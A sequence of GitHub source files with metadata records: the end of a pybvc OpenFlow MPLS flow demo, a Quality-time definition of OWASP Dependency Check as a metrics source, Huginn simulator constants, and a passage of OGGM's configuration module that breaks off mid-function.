flow_entry2.set_flow_name(flow_name)
flow_entry2.set_flow_id(flow_id)
flow_entry2.set_flow_cookie(cookie)
flow_entry2.set_flow_priority(priority)
flow_entry2.set_flow_hard_timeout(0)
flow_entry2.set_flow_idle_timeout(0)
# Instructions/Actions for the Flow Entry
instruction = Instruction(instruction_order=0)
action_order = 0
action = DecMplsTTLAction(action_order)
instruction.add_apply_action(action)
action_order += 1
action = OutputAction(action_order)
action.set_outport(act_out_port)
instruction.add_apply_action(action)
flow_entry2.add_instruction(instruction)
# Match Fields for the Flow Entry
match = Match()
match.set_in_port(match_in_port)
match.set_eth_type(match_eth_type)
match.set_mpls_label(match_mpls_label)
flow_entry2.add_match(match)
print ("\n")
print ("<<< Flow to send:")
print flow_entry2.get_payload()
time.sleep(rundelay)
result = ofswitch.add_modify_flow(flow_entry2)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow successfully added to the Controller")
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
exit(0)
print ("\n")
print ("<<< Delete flows from the Controller's cache "
"and from the table '%s' on the '%s' node" % (table_id, nodeName))
time.sleep(rundelay)
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
print ("\n")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print (">>> Demo End")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
if __name__ == "__main__":
of_demo_42()
| {
"content_hash": "f485fa150a827b8cbb138651e3c37322",
"timestamp": "",
"source": "github",
"line_count": 236,
"max_line_length": 77,
"avg_line_length": 30.546610169491526,
"alnum_prop": 0.5436260230267721,
"repo_name": "tnadeau/pybvc",
"id": "87a6dc80974ae7581529d86cc3e7eaf41fbf08d7",
"size": "8783",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "samples/sampleopenflow/demos/demo42.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Perl",
"bytes": "2452"
},
{
"name": "Python",
"bytes": "436853"
}
],
"symlink_target": ""
} |
"""OWASP Dependency Check source."""
from ..meta.entity import Color, EntityAttributeType
from ..meta.source import Source
from ..parameters import access_parameters, MultipleChoiceWithAdditionParameter, Severities
ALL_OWASP_DEPENDENCY_CHECK_METRICS = [
"dependencies",
"security_warnings",
"source_up_to_dateness",
"source_version",
]
DEPENDENCY_ATTRIBUTES: list[object] = [
dict(name="File path", url="url"),
dict(name="File path after applying regular expressions", key="file_path_after_regexp"),
dict(name="File name"),
]
SECURITY_WARNING_ATTRIBUTES = [
dict(name="Highest severity", color=dict(Critical=Color.NEGATIVE, High=Color.NEGATIVE, Medium=Color.WARNING)),
dict(name="Number of vulnerabilities", key="nr_vulnerabilities", type=EntityAttributeType.INTEGER),
]
OWASP_DEPENDENCY_CHECK = Source(
name="OWASP Dependency Check",
description="Dependency-Check is a utility that identifies project dependencies and checks if there are any known, "
"publicly disclosed, vulnerabilities.",
url="https://owasp.org/www-project-dependency-check/",
parameters=dict(
severities=Severities(values=["low", "moderate", "medium", "high", "critical"]),
variable_file_path_regexp=MultipleChoiceWithAdditionParameter(
name="Parts of file paths to ignore (regular expressions)",
short_name="parts of file paths to ignore",
help="Parts of file paths to ignore can be specified by regular expression. The parts of file paths that "
"match one or more of the regular expressions are removed. If, after applying the regular expressions, "
"multiple warnings are the same only one is reported.",
metrics=["dependencies", "security_warnings"],
),
**access_parameters(
ALL_OWASP_DEPENDENCY_CHECK_METRICS, source_type="an OWASP Dependency Check report", source_type_format="XML"
)
),
entities=dict(
security_warnings=dict(name="security warning", attributes=DEPENDENCY_ATTRIBUTES + SECURITY_WARNING_ATTRIBUTES),
dependencies=dict(name="dependency", name_plural="dependencies", attributes=DEPENDENCY_ATTRIBUTES),
),
)
| {
"content_hash": "69abcff4de3e1be50fdae2b85f8b4e7a",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 120,
"avg_line_length": 46.0625,
"alnum_prop": 0.7042062415196744,
"repo_name": "ICTU/quality-time",
"id": "1eb184760318c8b3ace63cd4fbb842e8d3b61ca1",
"size": "2211",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "components/shared_data_model/src/shared_data_model/sources/owasp_dependency_check.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "11325"
},
{
"name": "Dockerfile",
"bytes": "7493"
},
{
"name": "Gherkin",
"bytes": "48447"
},
{
"name": "HTML",
"bytes": "1575"
},
{
"name": "JavaScript",
"bytes": "547159"
},
{
"name": "Python",
"bytes": "1386198"
},
{
"name": "Shell",
"bytes": "19321"
}
],
"symlink_target": ""
} |
"""
The huginn.constants module contains the constant values used by the simulator
"""
# speed of sound at sea level (knots)
a0 = 661.4788
# standard sea level temperature (Kelvin)
T0 = 288.15
# pressure at sea level (Pascal)
p0 = 101325.0
# gravity constant in m/s
g = 9.80665
# molar mas of air
M = 28.97
# gas constant
R = 8314.4598
| {
"content_hash": "40bb63133dd3b1be4494f2750041be13",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 78,
"avg_line_length": 15.590909090909092,
"alnum_prop": 0.6997084548104956,
"repo_name": "pmatigakis/Huginn",
"id": "516b89c11e711f54008da5ce80ae731a12011798",
"size": "343",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "huginn/constants.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "10626"
},
{
"name": "GLSL",
"bytes": "1896"
},
{
"name": "HTML",
"bytes": "8336"
},
{
"name": "JavaScript",
"bytes": "16353"
},
{
"name": "Protocol Buffer",
"bytes": "4078"
},
{
"name": "Python",
"bytes": "266838"
},
{
"name": "RobotFramework",
"bytes": "59243"
},
{
"name": "Shell",
"bytes": "521"
}
],
"symlink_target": ""
} |
""" Configuration file and options
A number of globals are defined here to be available everywhere.
"""
import logging
import os
import shutil
import sys
import glob
from collections import OrderedDict
from distutils.util import strtobool
import warnings
import numpy as np
import pandas as pd
try:
from scipy.signal.windows import gaussian
except AttributeError:
# Old scipy
from scipy.signal import gaussian
from configobj import ConfigObj, ConfigObjError
try:
import geopandas as gpd
except ImportError:
pass
try:
import salem
except ImportError:
pass
from oggm.exceptions import InvalidParamsError
# Local logger
log = logging.getLogger(__name__)
# Path to the cache directory
CACHE_DIR = os.path.join(os.path.expanduser('~'), '.oggm')
if not os.path.exists(CACHE_DIR):
os.makedirs(CACHE_DIR)
# Path to the config file
CONFIG_FILE = os.path.join(os.path.expanduser('~'), '.oggm_config')
# config was changed, indicates that multiprocessing needs a reset
CONFIG_MODIFIED = False
# Share state across processes
DL_VERIFIED = dict()
DEM_SOURCE_TABLE = dict()
DATA = dict()
# Machine epsilon
FLOAT_EPS = np.finfo(float).eps
class DocumentedDict(dict):
"""Quick "magic" to document the BASENAMES entries."""
def __init__(self):
self._doc = dict()
def _set_key(self, key, value, docstr=''):
if key in self:
raise ValueError('Cannot overwrite a key.')
dict.__setitem__(self, key, value)
self._doc[key] = docstr
def __setitem__(self, key, value):
# Overrides the original dic to separate value and documentation
global CONFIG_MODIFIED
try:
self._set_key(key, value[0], docstr=value[1])
CONFIG_MODIFIED = True
except BaseException:
raise ValueError('DocumentedDict accepts only tuple of len 2')
def info_str(self, key):
"""Info string for the documentation."""
return ' {}'.format(self[key]) + '\n' + ' ' + self._doc[key]
def doc_str(self, key):
"""Info string for the documentation."""
return ' {}'.format(self[key]) + '\n' + ' ' + \
self._doc[key]
class ResettingOrderedDict(OrderedDict):
"""OrderedDict wrapper that resets our multiprocessing on set"""
def __setitem__(self, key, value):
global CONFIG_MODIFIED
OrderedDict.__setitem__(self, key, value)
CONFIG_MODIFIED = True
class PathOrderedDict(ResettingOrderedDict):
"""Quick "magic" to be sure that paths are expanded correctly."""
def __setitem__(self, key, value):
# Overrides the original dic to expand the path
try:
value = os.path.expanduser(value)
except AttributeError:
raise InvalidParamsError('The value you are trying to set does '
'not seem to be a valid path: '
'{}'.format(value))
ResettingOrderedDict.__setitem__(self, key, value)
class ParamsLoggingDict(ResettingOrderedDict):
"""Quick "magic" to log the parameter changes by the user."""
do_log = False
def __setitem__(self, key, value):
# Overrides the original dic to log the change
if self.do_log:
self._log_param_change(key, value)
ResettingOrderedDict.__setitem__(self, key, value)
def _log_param_change(self, key, value):
prev = self.get(key)
if prev is None:
if key in ['baseline_y0', 'baseline_y1']:
raise InvalidParamsError('The `baseline_y0` and `baseline_y1` '
'parameters have been removed. '
'You now have to set them explicitly '
'in your call to '
'`process_climate_data`.')
log.workflow('WARNING: adding an unknown parameter '
'`{}`:`{}` to PARAMS.'.format(key, value))
return
if prev == value:
return
if key == 'use_multiprocessing':
msg = 'ON' if value else 'OFF'
log.workflow('Multiprocessing switched {} '.format(msg) +
'after user settings.')
return
if key == 'mp_processes':
if value == -1:
import multiprocessing
value = multiprocessing.cpu_count()
if PARAMS.get('use_multiprocessing', False):
log.workflow('Multiprocessing: using all available '
'processors (N={})'.format(value))
else:
if PARAMS.get('use_multiprocessing', False):
log.workflow('Multiprocessing: using the requested number '
'of processors (N={})'.format(value))
return
log.workflow("PARAMS['{}'] changed from `{}` to `{}`.".format(key,
prev,
value))
# Globals
IS_INITIALIZED = False
PARAMS = ParamsLoggingDict()
PATHS = PathOrderedDict()
BASENAMES = DocumentedDict()
LRUHANDLERS = ResettingOrderedDict()
# Constants
SEC_IN_YEAR = 365*24*3600
SEC_IN_DAY = 24*3600
SEC_IN_HOUR = 3600
SEC_IN_MONTH = 2628000
DAYS_IN_MONTH = np.array([31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31])
G = 9.80665 # gravity
GAUSSIAN_KERNEL = dict()
for ks in [5, 7, 9]:
kernel = gaussian(ks, 1)
GAUSSIAN_KERNEL[ks] = kernel / kernel.sum()
_doc = ('A geotiff file containing the DEM (reprojected into the local grid).'
'This DEM is not smoothed or gap files, and is the closest to the '
'original DEM source.')
BASENAMES['dem'] = ('dem.tif', _doc)
_doc = ('A glacier mask geotiff file with the same extend and projection as '
'the `dem.tif`. This geotiff has value 1 at glaciated grid points and '
' value 0 at unglaciated points.')
BASENAMES['glacier_mask'] = ('glacier_mask.tif', _doc)
_doc = ('The glacier outlines in the local map projection (Transverse '
'Mercator).')
BASENAMES['outlines'] = ('outlines.shp', _doc)
_doc = ('The glacier intersects in the local map projection (Transverse '
'Mercator).')
BASENAMES['intersects'] = ('intersects.shp', _doc)
_doc = ('Each flowline has a catchment area computed from flow routing '
'algorithms: this shapefile stores the catchment outlines (in the '
'local map projection (Transverse Mercator).')
BASENAMES['flowline_catchments'] = ('flowline_catchments.shp', _doc)
_doc = ('The intersections between catchments (shapefile) in the local map '
'projection (Transverse Mercator).')
BASENAMES['catchments_intersects'] = ('catchments_intersects.shp', _doc)
_doc = 'A ``salem.Grid`` handling the georeferencing of the local grid.'
BASENAMES['glacier_grid'] = ('glacier_grid.json', _doc)
_doc = 'A dictionary containing runtime diagnostics useful for debugging.'
BASENAMES['diagnostics'] = ('diagnostics.json', _doc)
_doc = ('A netcdf file containing several gridded data variables such as '
'topography, the glacier masks, the interpolated 2D glacier bed, '
'and more.')
BASENAMES['gridded_data'] = ('gridded_data.nc', _doc)
_doc = ('A dictionary containing the shapely.Polygons of a glacier. The '
'"polygon_hr" entry contains the geometry transformed to the local '
'grid in (i, j) coordinates, while the "polygon_pix" entry contains '
'the geometries transformed into the coarse grid (the i, j elements '
'are integers). The "polygon_area" entry contains the area of the '
'polygon as computed by Shapely. The "catchment_indices" entry'
'contains a list of len `n_centerlines`, each element containing '
'a numpy array of the indices in the glacier grid which represent '
'the centerlines catchment area.')
BASENAMES['geometries'] = ('geometries.pkl', _doc)
_doc = ('A dictionary containing the downstream line geometry as well as the '
'bed shape computed from a parabolic fit.')
BASENAMES['downstream_line'] = ('downstream_line.pkl', _doc)
_doc = 'A text file with the source of the topo file (GIMP, SRTM, ...).'
BASENAMES['dem_source'] = ('dem_source.txt', _doc)
_doc = ('A hypsometry file computed by OGGM and provided in the same format '
'as the RGI (useful for diagnostics).')
BASENAMES['hypsometry'] = ('hypsometry.csv', _doc)
_doc = 'A list of :py:class:`oggm.Centerline` instances, sorted by flow order.'
BASENAMES['centerlines'] = ('centerlines.pkl', _doc)
_doc = ('A "better" version of the Centerlines, now on a regular spacing '
'i.e., not on the gridded (i, j) indices. The tails of the '
'tributaries are cut out to make more realistic junctions. '
'They are now "1.5D" i.e., with a width.')
BASENAMES['inversion_flowlines'] = ('inversion_flowlines.pkl', _doc)
_doc = 'The historical monthly climate timeseries stored in a netCDF file.'
BASENAMES['climate_historical'] = ('climate_historical.nc', _doc)
# so far, this is only ERA5_daily and does not work with the default OGGM
# mass balance module
_doc = ('The historical daily climate timeseries stored in a netCDF file.'
'(only temperature is really changing on daily basis,'
'precipitation is just assumed constant for every day')
BASENAMES['climate_historical_daily'] = ('climate_historical_daily.nc', _doc)
_doc = 'Deprecated: old name for `climate_historical`.'
BASENAMES['climate_monthly'] = ('climate_monthly.nc', _doc)
_doc = ('Some information (dictionary) about the mass '
'balance parameters for this glacier.')
BASENAMES['climate_info'] = ('climate_info.json', _doc)
_doc = 'The monthly GCM climate timeseries stored in a netCDF file.'
BASENAMES['gcm_data'] = ('gcm_data.nc', _doc)
_doc = "A dict containing the glacier's t*, bias, and the flowlines' mu*"
BASENAMES['local_mustar'] = ('local_mustar.json', _doc)
_doc = 'List of dicts containing the data needed for the inversion.'
BASENAMES['inversion_input'] = ('inversion_input.pkl', _doc)
_doc = 'List of dicts containing the output data from the inversion.'
BASENAMES['inversion_output'] = ('inversion_output.pkl', _doc)
_doc = 'List of flowlines ready to be run by the model.'
BASENAMES['model_flowlines'] = ('model_flowlines.pkl', _doc)
_doc = ('When using a linear mass balance for the inversion, this dict stores '
'the optimal ela_h and grad.')
BASENAMES['linear_mb_params'] = ('linear_mb_params.pkl', _doc)
_doc = 'Deprecated: renamed to `model_geometry`.'
BASENAMES['model_run'] = ('model_run.nc', _doc)
_doc = ('A netcdf file containing enough information to reconstruct the '
'entire flowline glacier geometry along the run (can be expensive'
'in disk space).')
BASENAMES['model_geometry'] = ('model_geometry.nc', _doc)
_doc = ('A netcdf file containing the model diagnostics (volume, '
'mass balance, length...).')
BASENAMES['model_diagnostics'] = ('model_diagnostics.nc', _doc)
_doc = ('A group netcdf file containing the model diagnostics (volume, '
'thickness, velocity...) along the flowlines (thus much heavier).'
'Netcdf groups = fl_{i}, with i between 0 and n_flowlines - 1')
BASENAMES['fl_diagnostics'] = ('fl_diagnostics.nc', _doc)
_doc = "A table containing the Huss&Farinotti 2012 squeezed flowlines."
BASENAMES['elevation_band_flowline'] = ('elevation_band_flowline.csv', _doc)
def set_logging_config(logging_level='INFO', future=False):
"""Set the global logger parameters.
Logging levels:
DEBUG
Print detailed information, typically of interest only when diagnosing
problems.
INFO
Print confirmation that things are working as expected, e.g. when
each task is run correctly (this is the default).
WARNING
Indication that something unexpected happened on a glacier,
but that OGGM is still working on this glacier.
ERROR
Print workflow messages and errors only, e.g. when a glacier cannot
run properly.
WORKFLOW
Print only high level, workflow information (typically, one message
per task). Errors and warnings will NOT be printed.
CRITICAL
Print nothing but fatal errors.
Parameters
----------
logging_level : str or None
the logging level. See description above for a list of options. Setting
to `None` is equivalent to `'CRITICAL'`, i.e. no log output will be
generated.
future : bool
use the new behavior of logging='WORKFLOW'.
"""
# Add a custom level - just for us
logging.addLevelName(45, 'WORKFLOW')
def workflow(self, message, *args, **kws):
"""Standard log message with a custom level."""
if self.isEnabledFor(45):
# Yes, logger takes its '*args' as 'args'.
self._log(45, message, args, **kws)
logging.WORKFLOW = 45
logging.Logger.workflow = workflow
# Remove all handlers associated with the root logger object.
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
# Spammers
logging.getLogger("Fiona").setLevel(logging.CRITICAL)
logging.getLogger("fiona").setLevel(logging.CRITICAL)
logging.getLogger("shapely").setLevel(logging.CRITICAL)
logging.getLogger("rasterio").setLevel(logging.CRITICAL)
logging.getLogger("matplotlib").setLevel(logging.CRITICAL)
logging.getLogger("numexpr").setLevel(logging.CRITICAL)
# Basic config
if logging_level is None:
logging_level = 'CRITICAL'
logging_level = logging_level.upper()
# Deprecation warning
if logging_level == 'WORKFLOW' and not future:
msg = ('In future versions of OGGM, the logging config WORKFLOW '
'will no longer print ERROR or WARNING messages, but only high '
'level information (i.e. hiding potential errors in your code '
'but also avoiding cluttered log files for runs with '
'many expected errors, e.g. global runs). If you want to obtain '
'a similar logger behavior as before, set '
"`logging_level='WARNING'`, which will print high level info "
"as well as errors and warnings during the run. If you "
"want to use the new behavior and suppress this warning, "
"set `logging_level='WORKFLOW'` and `future=True`.")
warnings.warn(msg, category=FutureWarning)
# Set old behavior
logging_level = 'WARNING'
logging.basicConfig(format='%(asctime)s: %(name)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=getattr(logging, logging_level))
def initialize_minimal(file=None, logging_level='INFO', params=None,
future=False):
"""Same as initialise() but without requiring any download of data.
This is useful for "flowline only" OGGM applications
Parameters
----------
file : str
path to the configuration file (default: OGGM params.cfg)
logging_level : str
set a logging level. See :func:`set_logging_config` for options.
params : dict
overrides for specific parameters from the config file
future : bool
use the new behavior of logging='WORKFLOW'.
"""
global IS_INITIALIZED
global PARAMS
global PATHS
set_logging_config(logging_level=logging_level, future=future)
is_default = False
if file is None:
file = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'params.cfg')
is_default = True
try:
cp = ConfigObj(file, file_error=True)
except (ConfigObjError, IOError) as e:
log.critical('Config file could not be parsed (%s): %s', file, e)
sys.exit()
if is_default:
log.workflow('Reading default parameters from the OGGM `params.cfg` '
'configuration file.')
else:
log.workflow('Reading parameters from the user provided '
'configuration file: %s', file)
# Static Paths
oggm_static_paths()
# Apply code-side manual params overrides
if params:
for k, v in params.items():
cp[k] = v
# Paths
PATHS['working_dir'] = cp['working_dir']
PATHS['dem_file'] = cp['dem_file']
PATHS['climate_file'] = cp['climate_file']
# Ephemeral paths overrides
env_wd = os.environ.get('OGGM_WORKDIR')
if env_wd and not PATHS['working_dir']:
PATHS['working_dir'] = env_wd
log.workflow("PATHS['working_dir'] set to env variable $OGGM_WORKDIR: "
+ env_wd)
# Do not spam
PARAMS.do_log = False
# Multiprocessing pool
try:
use_mp = bool(int(os.environ['OGGM_USE_MULTIPROCESSING']))
msg = 'ON' if use_mp else 'OFF'
log.workflow('Multiprocessing switched {} '.format(msg) +
'according to the ENV variable OGGM_USE_MULTIPROCESSING')
except KeyError:
use_mp = cp.as_bool('use_multiprocessing')
msg = 'ON' if use_mp else 'OFF'
log.workflow('Multiprocessing switched {} '.format(msg) +
'according to the parameter file.')
PARAMS['use_multiprocessing'] = use_mp
# Spawn
try:
use_mp_spawn = bool(int(os.environ['OGGM_USE_MP_SPAWN']))
msg = 'ON' if use_mp_spawn else 'OFF'
log.workflow('MP spawn context switched {} '.format(msg) +
'according to the ENV variable OGGM_USE_MP_SPAWN')
except KeyError:
use_mp_spawn = cp.as_bool('use_mp_spawn')
PARAMS['use_mp_spawn'] = use_mp_spawn
# Number of processes
mpp = cp.as_int('mp_processes')
if mpp == -1:
try:
mpp = int(os.environ['SLURM_JOB_CPUS_PER_NODE'])
log.workflow('Multiprocessing: using slurm allocated '
'processors (N={})'.format(mpp))
except (KeyError, ValueError):
import multiprocessing
mpp = multiprocessing.cpu_count()
log.workflow('Multiprocessing: using all available '
'processors (N={})'.format(mpp))
else:
log.workflow('Multiprocessing: using the requested number of '
'processors (N={})'.format(mpp))
PARAMS['mp_processes'] = mpp
# Size of LRU cache
try:
lru_maxsize = int(os.environ['LRU_MAXSIZE'])
log.workflow('Size of LRU cache set to {} '.format(lru_maxsize) +
'according to the ENV variable LRU_MAXSIZE')
except KeyError:
lru_maxsize = cp.as_int('lru_maxsize')
PARAMS['lru_maxsize'] = lru_maxsize
# Some non-trivial params
PARAMS['continue_on_error'] = cp.as_bool('continue_on_error')
PARAMS['grid_dx_method'] = cp['grid_dx_method']
PARAMS['topo_interp'] = cp['topo_interp']
PARAMS['use_intersects'] = cp.as_bool('use_intersects')
PARAMS['use_compression'] = cp.as_bool('use_compression')
PARAMS['border'] = cp.as_int('border')
PARAMS['mpi_recv_buf_size'] = cp.as_int('mpi_recv_buf_size')
PARAMS['use_multiple_flowlines'] = cp.as_bool('use_multiple_flowlines')
PARAMS['filter_min_slope'] = cp.as_bool('filter_min_slope')
PARAMS['auto_skip_task'] = cp.as_bool('auto_skip_task')
PARAMS['correct_for_neg_flux'] = cp.as_bool('correct_for_neg_flux')
PARAMS['filter_for_neg_flux'] = cp.as_bool('filter_for_neg_flux')
PARAMS['run_mb_calibration'] = cp.as_bool('run_mb_calibration')
PARAMS['rgi_version'] = cp['rgi_version']
PARAMS['use_rgi_area'] = cp.as_bool('use_rgi_area')
PARAMS['compress_climate_netcdf'] = cp.as_bool('compress_climate_netcdf')
PARAMS['use_tar_shapefiles'] = cp.as_bool('use_tar_shapefiles')
PARAMS['clip_mu_star'] = cp.as_bool('clip_mu_star')
PARAMS['clip_tidewater_border'] = cp.as_bool('clip_tidewater_border')
PARAMS['dl_verify'] = cp.as_bool('dl_verify')
PARAMS['calving_line_extension'] = cp.as_int('calving_line_extension')
PARAMS['use_kcalving_for_inversion'] = cp.as_bool('use_kcalving_for_inversion')
PARAMS['use_kcalving_for_run'] = cp.as_bool('use_kcalving_for_run')
PARAMS['calving_use_limiter'] = cp.as_bool('calving_use_limiter')
PARAMS['use_inversion_params_for_run'] = cp.as_bool('use_inversion_params_for_run')
k = 'error_when_glacier_reaches_boundaries'
PARAMS[k] = cp.as_bool(k)
PARAMS['store_model_geometry'] = cp.as_bool('store_model_geometry')
PARAMS['store_fl_diagnostics'] = cp.as_bool('store_fl_diagnostics')
# Climate
PARAMS['baseline_climate'] = cp['baseline_climate'].strip().upper()
PARAMS['hydro_month_nh'] = cp.as_int('hydro_month_nh')
PARAMS['hydro_month_sh'] = cp.as_int('hydro_month_sh')
PARAMS['climate_qc_months'] = cp.as_int('climate_qc_months')
PARAMS['temp_use_local_gradient'] = cp.as_bool('temp_use_local_gradient')
PARAMS['tstar_search_glacierwide'] = cp.as_bool('tstar_search_glacierwide')
PARAMS['geodetic_mb_period'] = cp['geodetic_mb_period']
PARAMS['use_winter_prcp_factor'] = cp.as_bool('use_winter_prcp_factor')
k = 'winter_prcp_factor_ab'
PARAMS[k] = [float(vk) for vk in cp.as_list(k)]
k = 'winter_prcp_factor_range'
PARAMS[k] = [float(vk) for vk in cp.as_list(k)]
k = 'temp_local_gradient_bounds'
PARAMS[k] = [float(vk) for vk in cp.as_list(k)]
k = 'tstar_search_window'
PARAMS[k] = [int(vk) for vk in cp.as_list(k)]
k = 'ref_mb_valid_window'
PARAMS[k] = [int(vk) for vk in cp.as_list(k)]
PARAMS['use_bias_for_run'] = cp.as_bool('use_bias_for_run')
k = 'free_board_marine_terminating'
PARAMS[k] = [float(vk) for vk in cp.as_list(k)]
k = 'store_diagnostic_variables'
PARAMS[k] = [str(vk) for vk in cp.as_list(k)]
k = 'store_fl_diagnostic_variables'
PARAMS[k] = [str(vk) for vk in cp.as_list(k)]
# Inversion
k = 'use_shape_factor_for_inversion'
PARAMS[k] = cp[k]
# Flowline model
k = 'use_shape_factor_for_fluxbasedmodel'
PARAMS[k] = cp[k]
k = 'glacier_length_method'
PARAMS[k] = cp[k]
# Others
PARAMS['tidewater_type'] = cp.as_int('tidewater_type')
# Precip factor can be none
try:
PARAMS['prcp_scaling_factor'] = cp.as_float('prcp_scaling_factor')
except ValueError:
PARAMS['prcp_scaling_factor'] = None
# Delete non-floats
ltr = ['working_dir', 'dem_file', 'climate_file', 'use_tar_shapefiles',
'grid_dx_method', 'run_mb_calibration', 'compress_climate_netcdf',
'mp_processes', 'use_multiprocessing', 'climate_qc_months',
'temp_use_local_gradient', 'temp_local_gradient_bounds',
'topo_interp', 'use_compression', 'bed_shape', 'continue_on_error',
'use_multiple_flowlines', 'tstar_search_glacierwide', 'border',
'mpi_recv_buf_size', 'hydro_month_nh', 'clip_mu_star',
'tstar_search_window', 'use_bias_for_run', 'hydro_month_sh',
'use_intersects', 'filter_min_slope', 'clip_tidewater_border',
'auto_skip_task', 'correct_for_neg_flux', 'filter_for_neg_flux',
'rgi_version', 'dl_verify', 'use_mp_spawn', 'calving_use_limiter',
'use_shape_factor_for_inversion', 'use_rgi_area',
'use_shape_factor_for_fluxbasedmodel', 'baseline_climate',
'calving_line_extension', 'use_kcalving_for_run', 'lru_maxsize',
'free_board_marine_terminating', 'use_kcalving_for_inversion',
'error_when_glacier_reaches_boundaries', 'glacier_length_method',
'use_inversion_params_for_run', 'ref_mb_valid_window',
'tidewater_type', 'store_model_geometry', 'use_winter_prcp_factor',
'store_diagnostic_variables', 'store_fl_diagnostic_variables',
'geodetic_mb_period', 'store_fl_diagnostics', 'winter_prcp_factor_ab',
'winter_prcp_factor_range', 'prcp_scaling_factor']
for k in ltr:
cp.pop(k, None)
# Other params are floats
for k in cp:
PARAMS[k] = cp.as_float(k)
PARAMS.do_log = True
# Empty defaults
set_intersects_db()
IS_INITIALIZED = True
def initialize(file=None, logging_level='INFO', params=None, future=False):
"""Read the configuration file containing the run's parameters.
This should be the first call, before using any of the other OGGM modules
for most (all?) OGGM simulations.
Parameters
----------
file : str
path to the configuration file (default: OGGM params.cfg)
logging_level : str
set a logging level. See :func:`set_logging_config` for options.
params : dict
overrides for specific parameters from the config file
future : bool
use the new behavior of logging='WORKFLOW'.
"""
global PARAMS
global DATA
initialize_minimal(file=file, logging_level=logging_level, params=params,
future=future)
# Do not spam
PARAMS.do_log = False
# Make sure we have a proper cache dir
from oggm.utils import download_oggm_files, get_demo_file
download_oggm_files()
# Read in the demo glaciers
file = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'data', 'demo_glaciers.csv')
DATA['demo_glaciers'] = pd.read_csv(file, index_col=0)
# Add other things
if 'dem_grids' not in DATA:
grids = {}
for grid_json in ['gimpdem_90m_v01.1.json',
'arcticdem_mosaic_100m_v3.0.json',
'Alaska_albers_V3.json',
'AntarcticDEM_wgs84.json',
'REMA_100m_dem.json']:
if grid_json not in grids:
fp = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'data', grid_json)
try:
grids[grid_json] = salem.Grid.from_json(fp)
except NameError:
pass
DATA['dem_grids'] = grids
# Trigger a one time check of the hash file
from oggm.utils import get_dl_verify_data
get_dl_verify_data('dummy_section')
# OK
PARAMS.do_log = True
def oggm_static_paths():
"""Initialise the OGGM paths from the config file."""
global PATHS, PARAMS
# See if the file is there, if not create it
if not os.path.exists(CONFIG_FILE):
dldir = os.path.join(os.path.expanduser('~'), 'OGGM')
config = ConfigObj()
config['dl_cache_dir'] = os.path.join(dldir, 'download_cache')
config['dl_cache_readonly'] = False
config['tmp_dir'] = os.path.join(dldir, 'tmp')
config['rgi_dir'] = os.path.join(dldir, 'rgi')
config['test_dir'] = os.path.join(dldir, 'tests')
config['has_internet'] = True
config.filename = CONFIG_FILE
config.write()
# OK, read in the file
try:
config = ConfigObj(CONFIG_FILE, file_error=True)
except (ConfigObjError, IOError) as e:
log.critical('Config file could not be parsed (%s): %s',
CONFIG_FILE, e)
sys.exit()
# Check that all keys are here
for k in ['dl_cache_dir', 'dl_cache_readonly', 'tmp_dir',
'rgi_dir', 'test_dir', 'has_internet']:
if k not in config:
raise InvalidParamsError('The oggm config file ({}) should have '
'an entry for {}.'.format(CONFIG_FILE, k))
# Override defaults with env variables if available
if os.environ.get('OGGM_DOWNLOAD_CACHE_RO') is not None:
ro = bool(strtobool(os.environ.get('OGGM_DOWNLOAD_CACHE_RO')))
config['dl_cache_readonly'] = ro
if os.environ.get('OGGM_DOWNLOAD_CACHE') is not None:
config['dl_cache_dir'] = os.environ.get('OGGM_DOWNLOAD_CACHE')
if os.environ.get('OGGM_EXTRACT_DIR') is not None:
# This is for the directories where OGGM needs to extract things
# On the cluster it might be useful to do it on a fast disc
edir = os.path.abspath(os.environ.get('OGGM_EXTRACT_DIR'))
config['tmp_dir'] = os.path.join(edir, 'tmp')
config['rgi_dir'] = os.path.join(edir, 'rgi')
# Fill the PATH dict
for k, v in config.iteritems():
if not k.endswith('_dir'):
continue
PATHS[k] = os.path.abspath(os.path.expanduser(v))
# Other
PARAMS.do_log = False
PARAMS['has_internet'] = config.as_bool('has_internet')
PARAMS['dl_cache_readonly'] = config.as_bool('dl_cache_readonly')
PARAMS.do_log = True
# Create cache dir if possible
if not os.path.exists(PATHS['dl_cache_dir']):
if not PARAMS['dl_cache_readonly']:
os.makedirs(PATHS['dl_cache_dir'])
# Always call this one!
oggm_static_paths()
def get_lru_handler(tmpdir=None, maxsize=None, ending='.tif'):
"""LRU handler for a given temporary directory (singleton).
Parameters
----------
tmpdir : str
path to the temporary directory to handle. Default is
``cfg.PATHS['tmp_dir']``.
maxsize : int
the max number of files to keep in the directory
ending : str
consider only the files with a certain ending
"""
global LRUHANDLERS
# see if we're set up
if tmpdir is None:
tmpdir = PATHS['tmp_dir']
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
# one handler per directory and file ending
# (in practice not very useful, but a dict is easier to handle)
k = (tmpdir, ending)
if k in LRUHANDLERS:
# was already there
lru = LRUHANDLERS[k]
# possibility to increase or decrease the cachesize if need be
if maxsize is not None:
lru.maxsize = maxsize
lru.purge()
return lru
else:
# we do a new one
from oggm.utils import LRUFileCache
# the files already present have to be counted, too
